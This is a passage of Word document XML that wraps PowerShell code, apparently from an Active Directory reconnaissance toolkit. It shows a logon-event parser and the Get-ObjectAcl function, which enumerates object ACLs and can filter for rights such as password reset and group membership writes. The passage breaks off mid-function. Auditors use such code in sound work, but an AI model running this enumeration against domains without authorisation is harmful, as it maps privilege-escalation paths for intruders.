    <w:p w14:paraId="6A178CE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Matches = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24852F6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2478E9E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB0ED39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17897C0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $LogonEventProperties = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1068B81F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'Domain' = $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C35FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'ComputerName' = $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5FCB47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'Username' = $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C064E9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'Address' = $Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5902C58F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'ID' = '4768'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A61E7B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'LogonType' = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79029551" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'Time' = $_.TimeCreated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732735B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42449FE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DB6FC1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                New-Object -TypeName PSObject -Property $LogonEventProperties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF2E244" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DF1C9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115907E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Error parsing event logs: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F90049A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D54D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617BE410" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E929AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F0D951" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59CDE1D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A5E317A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-ObjectAcl {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9CE186" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F84A11B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2550F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the ACLs associated with a specific active directory object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289FEA80" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="19F3F12A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E77A8BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F90EAEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SamAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4591232B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6BFF14BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Object name to filter for.        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB9AFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="250586FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6018A91F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D1CE4DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Object name to filter for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488449D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1610FA33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DistinguishedName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245B2223" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5739679D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Object distinguished name to filter for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5048D624" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="154BF055" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ResolveGUIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4FAAC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="145722C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Resolve GUIDs to their display names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDD221F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57730190" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720FC65A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6239711D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A customized ldap filter string to use, e.g. "(description=*admin*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B560A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59495E20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EACD6B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="77B59280" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC233E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344E2B6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35E45D12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSprefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D35408" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A4B7E3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Prefix to set for the searcher (like "CN=Sites,CN=Configuration")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D36C101" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="08970AD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER RightsFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2587E540" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6972877D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Only return results with the associated rights, "All", "ResetPassword","WriteMembers"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C4ABF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3904F4BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2E2612" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1B773C7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to use for the query, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48582083" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="77E415A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041FC698" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="521272BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C87502" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D3D97FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFC5240" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="20EC2177" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC9F42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E067653" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F635B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48771547" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-ObjectAcl -SamAccountName matt.admin -domain testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B782B4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C21C8AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get the ACLs for the matt.admin user in the testlab.local domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671C1B97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C5B572F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172C6C0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1E3A47F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-ObjectAcl -SamAccountName matt.admin -domain testlab.local -ResolveGUIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE72093" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D98571" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get the ACLs for the matt.admin user in the testlab.local domain and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E0F1F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        resolve relevant GUIDs to their display names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AEF66E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1B30BD3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D8C0DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="116B300F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581F6027" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="46B8948E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Enumerate the ACL permissions for all OUs in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3227E401" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F62BABA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="49A24C88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725EEAE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E657BAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipelineByPropertyName=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56466FB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6737BCF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $SamAccountName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6058CCCE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="49B5F7D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipelineByPropertyName=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F0E5DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AF406E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Name = "*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46477A14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F231AFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipelineByPropertyName=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF7849" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72466594" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DistinguishedName = "*",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B3CF89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A2D7C7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0D5FFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ResolveGUIDs,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62283690" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3BC2216F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2189611D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Filter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F5B72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1B43E9F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1772D856" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE2128A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1AEE13EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7F0BC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSprefix,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F33F89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2CD942BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E20994" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateSet("All","ResetPassword","WriteMembers")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B964017" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RightsFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E259D93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="041B0DE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF160B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73180161" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7AF9C937" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9413C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07387730" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C411E7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093B8824" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE281AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B95B751" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A686BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="148B616B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4225032A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Searcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -ADSprefix $ADSprefix -PageSize $PageSize </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F72C10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4562386E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # get a GUID -&gt; name mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641BACE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
